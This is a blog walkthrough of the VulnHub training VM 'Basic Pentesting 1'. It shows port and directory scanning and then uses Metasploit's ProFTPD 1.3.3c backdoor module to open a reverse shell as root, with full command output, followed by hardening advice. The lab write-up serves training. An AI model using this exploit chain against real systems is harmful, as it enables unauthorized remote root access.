Basic Pentesting 1

In this walk through we’ll look at how to compromise the simple VulnHub image, ‘Basic Pentesting 1’, released by Josiah Pierce.  The aim is to get Root privileges on the machine.

Details about the image and how to download it can all be found on the vulnhub website – https://www.vulnhub.com/entry/basic-pentesting-1,216/


Once the image has been downloaded and opened, it immediately gives away an OS type, version and a username.  We can note these down for use later on.

Basic Pentesting 1 - 1

To start our reconnaissance we need to find the IP address of the target;

Basic Pentesting 1 - 2

Basic Pentesting 1 - 3

This identifies 192.168.86.128 as being the IP address we need.  Note this is based on local DHCP so you will likely have a different target IP Address and MAC Address.

Now we know what we’re aiming for, let’s perform some basic recon and see what services are running.

Basic Pentesting 1 - 4

Basic Pentesting 1 - 5

We can note down the various services and software types for reference later, but for now we can start with the web service on TCP 80 as these are often low-hanging fruit.

It looks like there is a very basic website and if you look at the source code, nothing obviously exploitable;

Basic Pentesting 1 - 6

Let’s see if there are any hidden sites available to us by using Directory Buster;

Basic Pentesting 1 - 7

Success.  I tried to have a poke around the site but it was really slow to respond.  Unsure if this is a deliberate ‘feature# or not I left the page to ponder its self while I looked at other services on the machine.  Earlier on we found an FTP service called ProFTPD v1.3.3.c – let’s see if there are any known vulnerabilities on the exploit-database.

Basic Pentesting 1 - 9

Bingo!  Upon reviewing the exploits, one of them explains that some ‘enterprising’ people hacked the source code associated with this release and inserted a backdoor.  The code was compiled and released by the publisher before they spotted the issue.  These exploits make use of that backdoor.  In the interest of saving time, I thought I’d try and go for a quick win with Metasploit rather than reverse engineering the code to build my own exploit.

Fire up msfconsole and identify the exploit module;

Basic Pentesting 1 - 10

Then configure the module, in this case by identifying the IP address of the target.

Basic Pentesting 1 - 11

The exploit was successful and even more luckily for us, the FTP Server was running as Root so that’s it, game over.


 

What are the morals of the story here for Security conscious admins?

  • Only run services you really need.  If you don’t need it, turn it off to reduce the potential attack surface.
  • Keep your software up to date and review release notes and security resource like CVE and Exploit DB for vulnerabilities – this version of ProFTPD is several years old so no excuse for not having spotted the issue.
  • Only run services with suitably privileged accounts.  It seems unlikely that an FTP demon really needs to be run as root.  It could have quite easily been run as a Service account with lower privileges which would have made the process of compromising the machine much harder.

 

And what are the morals of the story for the Penetration Tester?

  • Be thorough in your enumeration, note down what you see
  • Don’t get dragged down the rabbit hole early on, keep looking for low hanging fruit before committing lots of time to something
  • Use metasploit by all means, but understand what is going on and why.  Could you have reverse engineered the module it to create your own version of the exploit if needed?

 

Command line I/O from this attack (edited for clarity);

root@kali:~# netdiscover -r 192.168.86.0/24

3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180

_____________________________________________________________________________

IP At MAC Address Count Len MAC Vendor / Hostname 
 -----------------------------------------------------------------------------
 192.168.86.1 00:50:56:c0:00:01 1 60 VMware, Inc. 
 192.168.86.128 00:0c:29:ca:f6:ba 1 60 VMware, Inc. 
 192.168.86.254 00:50:56:fc:1f:cf 1 60 VMware, Inc.

root@kali:~# ifconfig
eth0: flags=4163<up,broadcast,running,multicast> mtu 1500

inet 192.168.86.129 netmask 255.255.255.0 broadcast 192.168.86.255

**SNIP**




root@kali:~# nmap -n -v -Pn -p- -sV 192.168.86.128

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-07 13:44 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 13:44
Scanning 192.168.86.128 [1 port]
Completed ARP Ping Scan at 13:44, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:44
Scanning 192.168.86.128 [65535 ports]
Discovered open port 80/tcp on 192.168.86.128
Discovered open port 22/tcp on 192.168.86.128
Discovered open port 21/tcp on 192.168.86.128
Completed SYN Stealth Scan at 13:44, 5.72s elapsed (65535 total ports)
Initiating Service scan at 13:44
Scanning 3 services on 192.168.86.128
Completed Service scan at 13:45, 10.01s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.86.128.
Initiating NSE at 13:45
Completed NSE at 13:45, 0.02s elapsed
Initiating NSE at 13:45
Completed NSE at 13:45, 0.00s elapsed
Nmap scan report for 192.168.86.128
Host is up (0.0018s latency).
Not shown: 65532 closed ports

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

MAC Address: 00:0C:29:CA:F6:BA (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

root@kali:~# dirb http://192.168.86.128
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Wed Feb 7 13:48:39 2018
URL_BASE: http://192.168.86.128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612 
---- Scanning URL: http://192.168.86.128/ ----

+ http://192.168.86.128/index.html (CODE:200|SIZE:177) 
==> DIRECTORY: http://192.168.86.128/secret/ 
+ http://192.168.86.128/server-status (CODE:403|SIZE:302) 
---- Entering directory: http://192.168.86.128/secret/ ----
+ http://192.168.86.128/secret/index.php (CODE:301|SIZE:0) 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-content/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-includes/ 
+ http://192.168.86.128/secret/xmlrpc.php (CODE:405|SIZE:42) 
---- Entering directory: http://192.168.86.128/secret/wp-admin/ ----
+ http://192.168.86.128/secret/wp-admin/admin.php (CODE:302|SIZE:0) 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/css/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/images/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/includes/ 
+ http://192.168.86.128/secret/wp-admin/index.php (CODE:302|SIZE:0) 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/js/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/maint/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/network/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/user/

**SNIP**

root@kali:~#searchsploit proftpd 1.3.3ct

ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)




endroot@kali:~# msfconsole

msf > search proftpd

Matching Modules
================

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
 exploit/linux/ftp/proftp_sreplace 2006-11-26 great ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average NetSupport Manager Agent Remote Buffer Overflow
 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent ProFTPD-1.3.3c Backdoor Command Execution
 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent ProFTPD 1.3.5 Mod_Copy Command Execution


msf > use exploit/unix/ftp/proftpd_133c_backdoor

msf exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 RHOST yes The target address
 RPORT 21 yes The target port (TCP)

Exploit target:

Id Name
 -- ----
 0 Automatic

msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.86.128
rhost => 192.168.86.128
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.86.129:4444
[*] 192.168.86.128:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uGd9Cl4X4B1LGV5c;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uGd9Cl4X4B1LGV5c\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.86.129:4444 -> 192.168.86.128:57980) at 2018-02-07 13:59:56 +0000

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)</up,broadcast,running,multicast>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s